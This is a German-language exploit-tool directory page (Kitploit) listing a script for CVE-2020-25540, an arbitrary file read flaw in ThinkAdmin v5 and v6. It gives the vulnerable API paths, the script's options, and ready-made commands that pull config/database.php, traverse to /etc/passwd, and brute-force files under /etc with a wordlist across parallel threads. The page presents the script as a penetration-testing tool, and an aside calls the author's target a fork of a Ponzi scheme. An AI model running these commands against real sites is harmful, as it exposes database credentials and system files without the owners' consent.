Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2020-25540 — ThinkAdmin v5 v6 – Ausnutzung von Schwachstellen zum Lesen beliebiger Dateien, mit anpassbarem Wörterbuch-Brute-Force | Kitploit
Tools/GitHubGitHub/simonlee-hello/cve-2020-25540
PasswortangriffeSchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubsimonlee-hello/cve-2020-25540

CVE-2020-25540

ThinkAdmin v5 v6 – Ausnutzung von Schwachstellen zum Lesen beliebiger Dateien, mit anpassbarem Wörterbuch-Brute-Force

Repository anzeigen
vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

cve-2020-25540

Dieses Skript dient dazu, die Schwachstelle für beliebiges Dateilesen (Arbitrary File Read) in ThinkAdmin v5 und v6 auszunutzen.

==Die Schnittstellenpfade können je nach Version unterschiedlich sein (einige basieren auf einer Weiterentwicklung des ursprünglichen ThinkAdmin)==

  • Die Schnittstelle der Originalversion ist: /admin.html?s=admin/api.Update/get?/encode/xxxx
  • Meine Version ist (eine Weiterentwicklung eines Ponzi-Schemas): /admin.html?s=admin/api.Update/read?encode=xxxx

Grundlegende Verwendung

root@kitploit:~
usage: cve-2020-25540.py [-h] -t TARGET [-f FILE] [-w WORDLIST] [-b BASE_PATH]
                         [-p PARALLEL]

Dateien über die API lesen und Antworten abrufen

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                         Ziel-IP-Adresse oder Domain
  -f FILE, --file FILE  Pfad der zu lesenden Datei
  -w WORDLIST, --wordlist WORDLIST
                         Pfad zur Wörterbuchdatei, mehrere Dateipfade oder Dateinamen angeben
  -b BASE_PATH, --base-path BASE_PATH
                         Basispfad zum Kombinieren der Pfade aus der Wörterbuchdatei
  -p PARALLEL, --parallel PARALLEL
                         Anzahl paralleler Threads
root@kitploit:~
python3 cve-2020-25540.py -t "https://xxx.xx" -f "config/database.php"
python3 cve-2020-25540.py -t "https://xxx.xx" -f "../../../etc/passwd"
python3 cve-2020-25540.py -t "https://xxx.xx" -b "../../../etc/" -w wordlist.txt -p 10
Tool herunterladen